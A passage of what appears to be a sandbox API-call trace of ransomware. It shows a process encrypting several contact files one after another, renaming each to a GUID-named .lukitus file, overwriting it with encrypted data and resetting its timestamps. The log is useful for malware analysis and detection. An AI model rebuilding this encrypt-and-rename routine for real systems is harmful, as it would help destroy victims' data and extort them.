pdwDataLen=0x281f58c*=0x100) returned 1 [0111.047] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x494, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x494, lpOverlapped=0x0) returned 1 [0111.056] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0111.056] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x494, lpOverlapped=0x0) returned 1 [0111.056] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0111.056] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x66388df0, dwHighDateTime=0x1d31760)) [0111.056] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0111.056] FlushFileBuffers (hFile=0x328) returned 1 [0111.079] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\lulcit amkdfe.contact"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713ad6e0, ftCreationTime.dwHighDateTime=0x1d2fb2c, ftLastAccessTime.dwLowDateTime=0x713ad6e0, ftLastAccessTime.dwHighDateTime=0x1d2fb2c, ftLastWriteTime.dwLowDateTime=0x713ad6e0, ftLastWriteTime.dwHighDateTime=0x1d2fb2c, nFileSizeHigh=0x0, nFileSizeLow=0x496)) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.079] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.080] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.080] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.080] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.080] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.080] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.080] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0111.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0111.080] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0111.080] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="c:\\Users\\aETAdzjz\\Contacts\\F56924BE-9663-41BB-7BCE8B0A-B14ED50B7B3A.lukitus" (normalized: "c:\\users\\aetadzjz\\contacts\\f56924be-9663-41bb-7bce8b0a-b14ed50b7b3a.lukitus"), dwFlags=0x9) returned 1 [0111.082] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0111.082] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0111.089] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x496, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x496, lpOverlapped=0x0) returned 1 [0111.099] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0111.099] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x496, lpOverlapped=0x0) returned 1 [0111.100] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0111.100] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x663fb210, dwHighDateTime=0x1d31760)) [0111.100] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0111.100] FlushFileBuffers (hFile=0x328) returned 1 [0111.105] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\chucu jadnvk.contact"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71387580, ftCreationTime.dwHighDateTime=0x1d2fb2c, ftLastAccessTime.dwLowDateTime=0x71387580, ftLastAccessTime.dwHighDateTime=0x1d2fb2c, ftLastWriteTime.dwLowDateTime=0x71387580, ftLastWriteTime.dwHighDateTime=0x1d2fb2c, nFileSizeHigh=0x0, nFileSizeLow=0x499)) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0111.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0111.105] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0111.105] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\chucu jadnvk.contact"), lpNewFileName="c:\\Users\\aETAdzjz\\Contacts\\F56924BE-9663-41BB-432D0A28-59FA3E7273DF.lukitus" (normalized: "c:\\users\\aetadzjz\\contacts\\f56924be-9663-41bb-432d0a28-59fa3e7273df.lukitus"), dwFlags=0x9) returned 1 [0111.107] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0111.107] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0111.111] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x499, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x499, lpOverlapped=0x0) returned 1 [0111.117] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0111.117] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x499, lpOverlapped=0x0) returned 1 [0111.118] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0111.118] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x66421370, dwHighDateTime=0x1d31760)) [0111.118] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0111.119] FlushFileBuffers (hFile=0x328) returned 1 [0111.134] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\asdlfk poopvy.contact"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7133b2c0, ftCreationTime.dwHighDateTime=0x1d2fb2c, ftLastAccessTime.dwLowDateTime=0x7133b2c0, ftLastAccessTime.dwHighDateTime=0x1d2fb2c, ftLastWriteTime.dwLowDateTime=0x71361420, ftLastWriteTime.dwHighDateTime=0x1d2fb2c, nFileSizeHigh=0x0, nFileSizeLow=0x493)) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.134] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.135] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.135] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0111.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0111.135] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0111.135] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="c:\\Users\\aETAdzjz\\Contacts\\F56924BE-9663-41BB-E1736BF8-B7B89FCE74B3.lukitus" (normalized: "c:\\users\\aetadzjz\\contacts\\f56924be-9663-41bb-e1736bf8-b7b89fce74b3.lukitus"), dwFlags=0x9) returned 1 [0111.137] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0111.137] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0111.145] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x493, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x493, lpOverlapped=0x0) returned 1 [0111.146] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0111.146] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x493, lpOverlapped=0x0) returned 1 [0111.146] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0111.146] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6646d630, dwHighDateTime=0x1d31760)) [0111.146] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0111.147] FlushFileBuffers (hFile=0x328) returned 1 [0111.150] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x233cf8c0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x233cf8c0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e)) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0111.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0111.151] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0111.151] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\administrator.contact"), lpNewFileName="c:\\Users\\aETAdzjz\\Contacts\\F56924BE-9663-41BB-B8822C87-6D1307967B76.lukitus" (normalized: "c:\\users\\aetadzjz\\contacts\\f56924be-9663-41bb-b8822c87-6d1307967b76.lukitus"), dwFlags=0x9) returned 1 [0111.152] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0111.152] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0111.158] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x10b1e, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x10b1e, lpOverlapped=0x0) returned 1 [0111.166] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0111.166] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x10b1e, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x10b1e, lpOverlapped=0x0) returned 1 [0111.166] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0111.166] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x66493790, dwHighDateTime=0x1d31760)) [0111.166] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0111.167] FlushFileBuffers (hFile=0x328) returned 1 [0111.171] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x1, pbBuffer=0x281fca3 | out: pbBuffer=0x281fca3) returned 1 [0111.171] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x20, pbBuffer=0x281fb8c | out: pbBuffer=0x281fb8c) returned 1 [0111.171] CryptImportKey (in: hProv=0x5d0ba0, pbData=0x281f804, dwDataLen=0x8c, hPubKey=0x0, dwFlags=0x100, phKey=0x281fc60 | out: phKey=0x281fc60*=0x5fc2d8) returned 1 [0111.171] CryptCreateHash (in: hProv=0x5d0ba0, Algid=0x8009, hKey=0x5fc2d8, dwFlags=0x0, phHash=0x281fc64 | out: phHash=0x281fc64) returned 1 [0111.171] CryptSetHashParam (hHash=0x5fc318, dwParam=0x5, pbData=0x281f888, dwFlags=0x0) returned 1 [0111.171] CryptImportKey (in: hProv=0x5d0ba0, pbData=0x281f804, dwDataLen=0x8c, hPubKey=0x0, dwFlags=0x100, phKey=0x281fc58 | out: phKey=0x281fc58*=0x5fc358) returned 1 [0111.171] CryptCreateHash (in: hProv=0x5d0ba0, Algid=0x8009, hKey=0x5fc358, dwFlags=0x0, phHash=0x281fc5c | out: phHash=0x281fc5c) returned 1 [0111.171] CryptSetHashParam (hHash=0x5fc1d8, dwParam=0x5, pbData=0x281f888, dwFlags=0x0) returned 1 [0111.171] CryptHashData (hHash=0x5fc318, pbData=0x28b2ef0, dwDataLen=0xc1, dwFlags=0x0) returned 1 [0111.171] CryptGetHashParam (in: hHash=0x5fc318, dwParam=0x2, 